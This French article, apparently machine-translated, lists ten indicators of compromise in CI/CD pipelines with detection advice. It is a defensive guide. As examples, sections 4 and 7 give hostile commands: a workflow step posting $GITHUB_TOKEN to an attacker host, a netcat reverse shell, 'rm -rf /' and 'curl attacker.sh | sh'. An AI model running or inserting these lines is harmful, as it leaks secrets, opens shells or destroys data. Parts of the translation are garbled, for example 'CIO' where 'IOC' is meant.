Introduction : Quels sont les indicateurs de compromission en cybersécurité ?
Les indicateurs de compromission sont les premiers signes avant-coureurs que votre système ou pipeline pourrait être attaqué. En termes simples, indicateurs de compromis sont des traces laissées par les attaquants, comme d'étranges logins, modifications de fichiers ou logiciels malveillants cachés. cybersécurité du CIO, elles agissent comme des empreintes digitales sur une scène de crime, vous fournissant une preuve évidente que quelque chose ne va pas. Par conséquent, lorsque les développeurs demandent quels sont les indicateurs de compromission, la réponse ne se limite pas aux serveurs ou aux pare-feu, elle inclut également les risques cachés dans les systèmes modernes CI/CD pipelines.
Dans ces pipelineLes attaquants peuvent altérer le code, injecter des dépendances malveillantes ou modifier les étapes de construction sans se faire remarquer. Cependant, la plupart des guides se concentrent encore uniquement sur les serveurs ou les réseaux. Par conséquent, la chaîne d'approvisionnement logicielle est devenue l'une des cibles les plus faciles.
C'est pourquoi il est important de trouver des indicateurs de compromis dans CI/CD pipelines est essentiel. Surtout, il aide les équipes à bloquer les logiciels malveillants, à protéger les secrets et à sécuriser chaque étape de la livraison des logiciels.
Top 10 des indicateurs de compromission CI/CD Pipelines
Lorsqu'on explique les indicateurs de compromission, la plupart des listes se concentrent sur les serveurs ou les réseaux. Pourtant, CI/CD pipelineLes attaquants laissent des empreintes très différentes. Reconnaître ces signaux est crucial pour une défense proactive. Voici les 10 signaux d'alerte en matière de cybersécurité du CIO que tout développeur et ingénieur sécurité devrait surveiller.
1. Modifications de dépendances suspectes
L’un des principaux indicateurs de compromis dans pipelines est une mise à jour de dépendance soudaine et étrange. Les attaquants exploitent souvent la confiance que les développeurs accordent aux gestionnaires de paquets pour ajouter des paquets dangereux.
Par exemple, dans npm a package.json diff peut soudainement inclure :
+ "crypto-helper": "^1.0.2"
De tels changements peuvent sembler sûrs, mais peuvent injecter du code trojanisé dans chaque build.
Impact: les versions compromises héritent des logiciels malveillants à la source.
Détection: appliquez les révisions de dépendances, suivez les différences de fichiers de verrouillage et analysez les nouveaux packages en permanence.
2. Code obscurci dans les builds
Les auteurs de logiciels malveillants utilisent l'obfuscation pour contourner les avis. Par conséquent, cet indicateur de compromission CI/CD pipelineLes charges utiles obscurcies peuvent être parmi les plus difficiles à détecter. En fait, les charges utiles obscurcies se glissent souvent dans des bibliothèques open source ou des images de conteneurs sans préavis.
Par exemple :
- Un package PyPI utilisant
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - Une image Docker remplie de binaires UPX non nécessaires.
- JavaScript plein de
\x41\x42échappe aux voleurs de justificatifs d'identité qui se cachent.
Impact: Le code caché s'exécute silencieusement pendant la construction ou l'exécution, ce qui en fait un signal critique dans la cybersécurité IOC.
Détection: Combiner SAST avec analyse des logiciels malveillants pour identifier le code codé ou compressé. Surtout, considérez l'obfuscation comme un signal d'alarme qui mérite une enquête plus approfondie.
3. Secrets révélés dans Git : un risque de cybersécurité classique pour l'IOC
CI/CD pipelineLes utilisateurs héritent souvent des secrets directement des référentiels. Cependant, quand les secrets apparaissent dans Git, ils deviennent l’une des réponses les plus claires à la question « quels sont les indicateurs de compromis dans pipelines ? » Une fois que les informations d’identification arrivent dans Git, les attaquants peuvent les exploiter indéfiniment.
Par exemple :
- A
.envfichier contenantAWS_SECRET_KEY=. - Jetons insérés
config.json. - Les secrets sont toujours visibles dans l'historique Git même après la suppression.
Impact: Les clés exposées donnent aux attaquants un accès direct à CI/CD pipelines, systèmes cloud ou bases de données. Il s'agit donc de l'un des indicateurs de compromission les plus dangereux.
Détection: Utilisez le pre-commit hooks et les tâches CI pour l'analyse secrète, et révoquez immédiatement les clés divulguées. De plus, appliquez des mesures correctives automatisées pour réduire les fenêtres d'exposition.
4. Falsifié Pipeline Configurations : indicateurs cachés de compromission
Pipeline les configurations sont des cibles de grande valeur car une seule modification détourne souvent l'ensemble du flux de travail. Par conséquent, falsifié pipeline Les fichiers constituent un risque majeur de cybersécurité pour le CIO que les outils de surveillance traditionnels détectent rarement.
Par exemple :
Dans les actions GitHub :
- run: curl -X POST http://attacker[.]com --data $GITHUB_TOKEN- Dans GitLab : un travail malveillant ajouté à
.gitlab-ci.ymlqui déverse des données sensibles. - Dans Jenkins :
sh "nc -e /bin/bash attacker.com 4444".
Impact: Ces modifications non approuvées transforment votre pipeline dans une porte dérobée permanente pour les attaquants, ce qui est clairement considéré comme un indicateur de compromission.
Détection: Appliquez les configurations signées, exigez l'approbation des relations publiques et surveillez les tâches imprévues. De plus, définissez guardrails qui bloquent automatiquement les flux de travail modifiés.
5. Privilégié IaC La valeur par défaut
Des définitions d'infrastructure mal configurées créent souvent des portes dérobées cachées. Par conséquent, les valeurs par défaut privilégiées IaC constituent un risque classique de cybersécurité pour le CIO.
Par exemple :
- Un déploiement Kubernetes accordant des pods
privileged: true. - Graphiques Helm exposant les services avec
0.0.0.0:22.
Impact: Les attaquants obtiennent un accès au niveau racine ou exposent publiquement les services internes. Par conséquent, ces problèmes élargissent considérablement la surface d'attaque.
Détection: Appliquer IaC Analysez les données pour appliquer le principe du moindre privilège avant la fusion. De plus, assurez-vous que chaque configuration est vérifiée dans le cadre de la pipeline.
6. Comportements de construction inhabituels
Les attaquants modifient souvent pipeline comportement susceptible de favoriser des actions malveillantes. Autrement dit, une activité de construction inhabituelle est l'une des réponses les plus évidentes aux indicateurs de compromission. CI/CD pipelines.
Par exemple :
- Construit des requêtes réseau sortantes vers des domaines étranges.
- Un projet Node.js générant soudainement PowerShell pendant
npm install. - Un travail CI téléchargeant de gros binaires non définis dans les scripts de build.
Impact: Les builds compromises peuvent servir de points de distribution de logiciels malveillants. Surtout, elles propagent des charges utiles malveillantes à chaque déploiement.
Détection: Surveillez les journaux de build pour détecter les processus ou connexions inattendus. De plus, configurez la détection des anomalies pour signaler les comportements anormaux.
7. Scripts de paquets malveillants : risques de cybersécurité pour le CIO
Les gestionnaires de paquets prennent en charge le cycle de vie hooks que les attaquants exploitent. Par conséquent, les scripts malveillants dans npm, PyPI ou Dockerfiles sont de forts indicateurs de compromission.
Par exemple :
- npm :
postinstallscript en cours d'exécutionrm -rf /ou un balisage vers un C2. - PyPI:
setup.pyexécution de code Python caché lors de l'installation. - Fichier Docker :
RUN curl attacker.sh | sh.
Impact: L'attaque s'exécute pendant l'installation, avant tout test d'exécution. Par conséquent, les développeurs risquent de ne s'en apercevoir que trop tard.
Détection: Analysez les manifestes de paquets pour détecter les scripts d'installation. Limitez également les risques. hooks in CI/CD emplois pour réduire l'exposition.
8. Indicateurs d'empoisonnement du registre de compromission
Les attaquants remplacent ou modifient des artefacts dans les registres, et ces événements sont des exemples classiques de ce que sont les indicateurs de compromission dans la chaîne d'approvisionnement. pipelines.
Par exemple :
- Une balise d'image Docker mise à jour silencieusement avec une couche trojanisée.
- Un package interne remplacé par une version empoisonnée.
- squattage de l'espace de noms npm, comme
lodash-proxy.
Impact: Chaque build utilisant l'artefact de registre est compromis. De plus, la compromission se propage aux services en aval.
Détection: Appliquez des contrôles de signature et d'intégrité à toutes les extractions de registre. Suivez également l'origine des artefacts avec SBOM validation.
9. Activité anormale des utilisateurs comme preuve du CIO
Les comptes compromis laissent presque toujours des traces anormales. Par conséquent, un comportement inhabituel des développeurs est un indicateur fort de compromission.
Par exemple :
- Commits poussé à 3 heures du matin, heure locale.
- Approbations de RP par les comptes en vacances.
- Pipelines'est déclenché avec une fréquence inhabituelle.
Impact: Les attaquants exploitent les identifiants volés pour introduire des modifications malveillantes. Après tout, les modifications non autorisées commits'intègrent facilement dans les flux de travail normaux.
Détection: Écran tactile SCM détecter les anomalies, appliquer l'authentification multifacteur (MFA) et renouveler régulièrement les jetons. De plus, alerter en cas de suspicion commit ou des modèles d'approbation.
10. Échec des vérifications d'intégrité ou de signature dans la cybersécurité du CIO
Un phénomène courant mais ignoré indicateur de compromis Il s'agit d'un échec de vérification d'intégrité ou de signature. En cybersécurité IOC, ces vérifications vérifient l'authenticité du code ou des artefacts. Les ignorer laisse pipelines exposé.
Exemples :
- Un hachage SHA256 ne correspondant pas à la somme de contrôle attendue.
- Une signature GPG manquante ou non valide.
- An SBOM montrant des artefacts non signés.
Impact: Les défaillances d’intégrité signifient souvent une falsification, un empoisonnement du registre ou une injection de logiciels malveillants.
Détection: Automatisez les vérifications de signature, appliquez la validation des sommes de contrôle et bloquez les composants non signés. Surtout, considérez chaque vérification échouée comme une preuve évidente de compromission.
CI/CD Aperçu des indicateurs de compromission
| Indicateur de compromission (IOC) | Impact dans CI/CD Pipelines | Comment détecter |
|---|---|---|
| Modifications de dépendances suspectes | Les attaquants injectent des bibliothèques malveillantes dans les gestionnaires de packages, ce qui conduit à des builds compromises. | Suivez les différences de fichiers de verrouillage, appliquez les révisions de dépendances et analysez les dépendances en continu. |
| Code obscurci dans les builds | Les charges utiles cachées s'exécutent pendant les builds ou l'exécution sans détection. | Utilisez le SAST et l'analyse des logiciels malveillants pour signaler les modèles de code base64, hexadécimal ou compressés. |
| Secrets révélés dans Git | Les jetons ou clés API divulgués donnent aux attaquants un accès direct aux systèmes critiques. | Exécuter des analyses secrètes dans Git hooks et révoquer automatiquement les informations d'identification divulguées. |
| trafiqué Pipeline Configurations | Les flux de travail modifiés permettent l'exfiltration ou la persistance des données à l'intérieur CI/CD. | Exiger les approbations des relations publiques, appliquer les configurations signées et surveiller pipeline changements. |
| Privilégié IaC La valeur par défaut | Des rôles trop permissifs ou des valeurs par défaut non sécurisées exposent les environnements cloud. | Analysez les fichiers Terraform, Kubernetes et Helm pour appliquer le principe du moindre privilège. |
| Comportements de construction inhabituels | Pipelinesont utilisés comme points de distribution de logiciels malveillants ou pour le mouvement latéral. | Analysez les journaux de build pour détecter les téléchargements, les processus ou les appels sortants inattendus. |
| Scripts de paquets malveillants | Les scripts pré/post-installation cachés déclenchent des charges utiles avant les tests d'exécution. | Bloquez les scripts npm/PyPI risqués et limitez leur exécution CI/CD emplois. |
| Empoisonnement du registre | Les artefacts trojanisés remplacent les images ou les binaires de confiance dans les registres. | Vérifiez les sommes de contrôle, appliquez la validation des signatures et analysez les registres de manière proactive. |
| Activité anormale des utilisateurs | Les comptes compromis propagent des messages malveillants commits ou déclencheur pipelines. | Appliquer l'authentification multifacteur et surveiller commits pour les anomalies et analyser login modèles |
| Échec des vérifications d'intégrité ou de signature | Indique du code falsifié, des dépendances ou des images entrant dans le pipeline. | Automatisez les contrôles d’intégrité et bloquez les composants non signés ou incompatibles. |
Pourquoi la cybersécurité traditionnelle du CIO échoue CI/CD Risques
La plupart des organisations surveillent déjà les indicateurs de compromission sur les serveurs, les ordinateurs ou les réseaux. Cependant, cette approche classique de la cybersécurité basée sur l'IOC ignore CI/CD pipelines, qui constituent désormais l'une des surfaces d'attaque les plus critiques. En fait, pipelines montrent des signaux de compromis uniques que les outils traditionnels ne peuvent pas détecter.
Indicateurs de compromission dans la sécurité traditionnelle
Dans la cybersécurité conventionnelle du CIO, l'accent est généralement mis sur :
- Insolite logins ou adresses IP suggérant des informations d'identification volées.
- Hachages de fichiers suspects ou modifications de registre révélant des logiciels malveillants.
- Trafic sortant inattendu indiquant une exfiltration de données.
Ce sont des indicateurs bien connus également suivis dans le Cadre MITRE ATT & CK, qui cartographie les comportements et tactiques courants des adversaires. Ces signaux sont utiles. Cependant, ils s'appliquent principalement aux systèmes d'exploitation ou aux réseaux d'entreprise. Par conséquent, ils passent à côté des manipulations subtiles qui se produisent en amont de la chaîne d'approvisionnement logicielle.
Pourquoi CI/CD Pipelines sont différents
CI/CD pipelinesont des environnements automatisés dans lesquels les développeurs commit Code, extraction des dépendances et versions publiées. Les attaquants savent qu'une compromission se répercute sur tous les déploiements. Par conséquent, quels sont les indicateurs de compromission ? CI/CD pipelines? Ils ont l'air très différents :
- Une dépendance malveillante ajoutée silencieusement à package.json ou requirements.txt.
- Clés API ou jetons exposés dans Git commitfichiers s ou .env.
- Code obscurci injecté dans les packages npm ou PyPI.
- Fichiers Terraform ou Kubernetes avec des valeurs par défaut non sécurisées telles que privileged : true.
- Pipeline tâches modifiées pour exfiltrer des données ou ouvrir des portes dérobées.
Ces signaux de compromis dans CI/CD rester invisible pour standard outils de sécurité.
Le fossé en matière de cybersécurité du CIO
Bien que de nombreuses équipes comprennent l'importance des indicateurs de compromission, elles se fient encore uniquement à la détection des serveurs et des journaux réseau. Par conséquent, les attaquants peuvent empoisonner des builds ou introduire des logiciels malveillants sans laisser de traces. C'est pourquoi des incidents tels que la porte dérobée XZ Utils ou les packages npm malveillants sont passés inaperçus jusqu'à leur mise en production.
Ces types de compromis dans la chaîne d’approvisionnement sont également mis en évidence par CISConseils de sécurité de la chaîne d'approvisionnement d'A, qui prévient que les attaquants ciblent de plus en plus CI/CD pipelines et registres.
A Retenir
La cybersécurité traditionnelle du CIO est nécessaire, mais insuffisante. Les équipes doivent avant tout identifier les indicateurs de compromission spécifiques à chaque domaine. CI/CD pipelines. Ce n'est qu'alors qu'ils peuvent détecter un code malveillant ou pipeline les abus avant qu’ils ne se propagent dans les environnements.
